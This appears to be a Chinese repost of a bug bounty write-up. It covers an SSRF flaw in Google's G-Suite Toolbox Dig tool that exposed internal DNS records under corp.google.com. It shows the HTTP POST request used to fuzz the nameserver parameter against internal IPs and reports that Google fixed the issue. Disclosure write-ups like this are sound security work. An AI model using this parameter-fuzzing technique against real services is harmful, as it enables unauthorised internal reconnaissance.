欢迎光临
我们一直在努力

利用ssrf漏洞获取google内部的dns信息

在一月下旬,我发现并报告了toolbox.googleapps.com上GoogleVRP的SSRF漏洞,利用这个漏洞可以发现谷歌内部DNS服务器,提取到各种企业信息,同时也暴露了许多公司内部IP地址以及A记录和NS记录,如谷歌的目录结构和一个有趣的Minecraft服务器!以上是关于这个漏洞的简要说明。G-Suite工具箱可以用来排除各种故障。在这其中,有一款工具叫做“Dig”,在Linux上可用于查询DNS服务器的域名解析记录,就像A记录MX记录等等,基于这个工具,Google开发了一个漂亮的WEB界面,可以直观的查找DNS信息,看起来很棒,下图是通过谷歌查询DNS服务器

googleapps_dig_ssrf-0 利用ssrf漏洞获取google内部的dns信息

“Name server”字段引起了我的注意,当我试图查询127.0.0.1的DNS记录时,它的响应是“Server did not respond”

googleapps_dig_ssrf-0 利用ssrf漏洞获取google内部的dns信息

它像是尝试连接到127.0.0.1:53获取DNS信息,这看起来很像SSRF,

Ok Google,响应内部DNS服务器!

感谢BrupSuite的intruder模块,它可以快速自动检测“name server”相应的HTTP POST 参数

POST /apps/dig/lookup HTTP/1.1

Host: toolbox.googleapps.com

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: https://toolbox.googleapps.com/apps/dig/

Content-Length: 107

Cookie: csrftoken=NE5nKGrbPNRoEwm0mahDzop9iJfsxU4H; _ga=GA1.2.2102640869.1486420030; _gat=1

Connection: close

csrfmiddlewaretoken=NE5nKGrbPNRoEwm0mahDzop9iJfsxU4H&domain=www.rcesecurity.com&nameserver=§127.0.0.1§&typ=a

几分钟后,我发现了一个比较有希望利用的内网IP,它回应了我的请求,但是只有一个空的A记录给我的域名:

googleapps_dig_ssrf-0 利用ssrf漏洞获取google内部的dns信息

因为我对自己域名非常了解,所以我想要从Google再提取一些内部不可公开的信息。

Ok Google,给我你的内部域名!

找了很久,在这里找到了我想要知道的东西。Google似乎正在使用“corp.google.com”作为其公司网域,至少里面也会有一些工具,比如“MoMa – Inside Google”托管在该域名下。现在我继续用POST请求来爆破corp.google.com的子域名,后来我发现了一个有趣的A记录,”ad.corp.google.com“

Ok Google,提供「ad.corp.google.com」的所有A纪录!

googleapps_dig_ssrf-0 利用ssrf漏洞获取google内部的dns信息

 

与公共DNS记录上的可用内容相比,这个看起来更有趣:

dig A ad.corp.google.com @8.8.8.8

?

; <<>> DiG 9.8.3-P1 <<>> A ad.corp.google.com @8.8.8.8

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 5981

;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

?

;; QUESTION SECTION:

;ad.corp.google.com. IN A

?

;; AUTHORITY SECTION:

corp.google.com. 59 IN SOA ns3.google.com. dns-admin.google.com. 147615698 900 900 1800 60

?

;; Query time: 28 msec

;; SERVER: 8.8.8.8#53(8.8.8.8)

;; WHEN: Wed Feb 15 23:56:05 2017

;; MSG SIZE??rcvd: 86

这很内网~

Ok Google,给我与该域名相关联的NS记录(及其内部IP)!

googleapps_dig_ssrf-0 利用ssrf漏洞获取google内部的dns信息

Ok Google,让我们更具体。给我有关“gc._msdcs”的信息!

googleapps_dig_ssrf-0 利用ssrf漏洞获取google内部的dns信息

Ok Google,还有什么你想让我看到吗?

googleapps_dig_ssrf-0 利用ssrf漏洞获取google内部的dns信息

向Google报告此漏洞后,他们迅速修复了此漏洞。感谢Google的赏金!

 

未经允许不得转载:杂术馆 » 利用ssrf漏洞获取google内部的dns信息
分享到: 更多 (0)